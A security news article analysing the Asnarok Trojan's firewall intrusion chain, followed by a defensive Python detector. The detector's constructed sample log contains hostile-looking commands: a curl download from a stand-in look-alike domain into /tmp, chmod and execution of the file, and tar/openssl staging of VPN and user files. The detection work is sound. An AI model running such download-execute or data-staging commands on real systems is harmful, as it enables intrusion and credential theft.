A very experienced hacking group has been detected breaking into networks and firewalls using malware called the Asnarok Trojan, also known as Asnarök.
This is a very recent coordinated attack that has been classified as highly destructive. Considerable effort has gone into analyzing the Trojan's capabilities and the damage it causes on victim networks.
The Asnarok Trojan Attacks: the Initial Infection
Last week several high-impact attacks were carried out against the network infrastructure of various businesses and the firewalls guarding it. The investigation shows that the initial infections appear to be caused by a previously unknown SQL injection bug. A successful exploit results in an attack being launched on the firewall protecting the target network.
This tactic supports two important assumptions about the hackers behind the Trojan operation. The first is that the targets are probably well researched by the criminal group: the hackers appear to have uncovered a dangerous bug and learned how to exploit it. To execute it they need to check that the system meets all the requirements: a database server running the necessary software version and an attached firewall that can be exploited. All of this can be done either by running manual scans or by using complex hacking toolkits loaded with the necessary variables and options. It is also possible that all of this is done by the Asnarok Trojan itself.
Analysis of the Trojan's operations shows that the SQL injection is actually a one-line snippet placed in one of the existing databases. It causes the database server to retrieve a file from a hacker-controlled server hosted on a domain name that sounds safe and legitimate to administrators because it impersonates a firewall vendor. The file is the actual payload dropper, responsible for the Trojan's installation and operation. It is dropped into a temporary folder meant for files the system does not always use, modified to be executable by users and processes, and then started.
Asnarok Trojan Unleashed: Impact on the Systems
As soon as the installation script is triggered on the contaminated computers, the first action is to run a series of SQL commands. They are designed to modify or delete certain values stored in database tables; one of them is the display of the administrative IP address of the contaminated device. According to the researchers, this is done to hide the presence of the infiltration.
The payload installer script then launches two other separate scripts, which are downloaded and executed from the same temporary folder. They modify the configuration of the deployed firewalls, boot-time services and other running applications. An additional mechanism run by the engine is the persistent installation of all malware code: every time the device is started, the scripts are launched. Some of the ordinary running applications and services may be stopped or modified. One of the scripts establishes the Trojan connection, linking the hijacked machine to a remote server from which a program is downloaded. This runs a malicious firewall that replaces the standard running software.
The consequences of the Trojan's actions include data theft, which can cover database contents and machine system data. The collected information can be used to create a unique ID based on the extracted data. The complete Asnarok Trojan analysis shows it hijacks the following data: public IP address, firewall license key, SQL user account info, administrator passwords, VPN users and policies. The collected data is archived using the tar command and then encrypted using OpenSSL. The resulting file is sent to the hackers via the Trojan's network connection.
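The two host-level chains described above (a file fetched into a temporary folder, made executable and run; then data archived with tar and encrypted with OpenSSL) are what a defender would hunt for in process-execution logs. The following is an added detection sketch written for this article, not code from the original report or from any vendor; the log format, the path names, the user names and the look-alike domain are all constructed for the example.

```python
import re

# Constructed process-execution log for this example (not real incident data).
# Format: <timestamp> pid=<n> ppid=<n> user=<u> cmd=<command line>
SAMPLE_LOG = """\
2020-04-26T02:11:03Z pid=4102 ppid=2077 user=postgres cmd=curl -o /tmp/Install.sh https://vendor-lookalike.example/update
2020-04-26T02:11:04Z pid=4103 ppid=2077 user=postgres cmd=chmod a+x /tmp/Install.sh
2020-04-26T02:11:05Z pid=4104 ppid=2077 user=postgres cmd=/tmp/Install.sh
2020-04-26T02:13:40Z pid=4120 ppid=4104 user=root cmd=tar cf /tmp/Collect.tar /etc/vpn /var/db/users
2020-04-26T02:13:41Z pid=4121 ppid=4104 user=root cmd=openssl enc -aes-256-cbc -in /tmp/Collect.tar -out /tmp/Collect.tar.enc
2020-04-26T09:00:00Z pid=5001 ppid=1 user=backup cmd=tar cf /backup/daily.tar /var/lib
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")   # world-writable staging locations (assumed set)
DOWNLOADERS = {"curl", "wget"}

def parse(log_text):
    """Return one dict per well-formed log line."""
    return [m.groupdict() for m in map(LINE_RE.match, log_text.splitlines()) if m]

def exec_bit_set(mode):
    """True for chmod modes that grant execute: symbolic 'x' or an odd octal digit."""
    return "x" in mode or (mode.isdigit() and any(int(d) & 1 for d in mode))

def detect(log_text):
    """Return (rule, pid) alerts for the dropper chain and the tar/openssl staging chain."""
    alerts, downloaded, executable, archived = [], set(), set(), set()
    for ev in parse(log_text):
        argv = ev["cmd"].split()
        tool = argv[0].rsplit("/", 1)[-1]
        tmp = {a for a in argv if a.startswith(TEMP_DIRS)}
        if tool in DOWNLOADERS and tmp:
            downloaded |= tmp                      # stage 1: fetch into a temp dir
        elif tool == "chmod" and len(argv) > 2 and exec_bit_set(argv[1]):
            executable |= tmp                      # stage 2: make it executable
        elif argv[0] in downloaded & executable:
            alerts.append(("dropper_chain", ev["pid"]))      # stage 3: run it
        elif tool == "tar" and tmp:
            archived |= tmp                        # archive staged in a temp dir
        elif tool == "openssl" and len(argv) > 1 and argv[1] == "enc" and tmp & archived:
            alerts.append(("encrypted_staging", ev["pid"]))  # tar -> openssl enc
    return alerts

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_LOG):
        print(f"{rule}: pid {pid}")
```

The routine backup on the last sample line does not fire because it neither writes to a temporary folder nor is followed by an openssl enc on its archive.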
Soon after the initial infections took place, the vendor released a patch for all vulnerable devices. Automatic updates on firewalls should be enabled so that the patch file is retrieved from the vendor and applied automatically. For further information, refer to the initial report.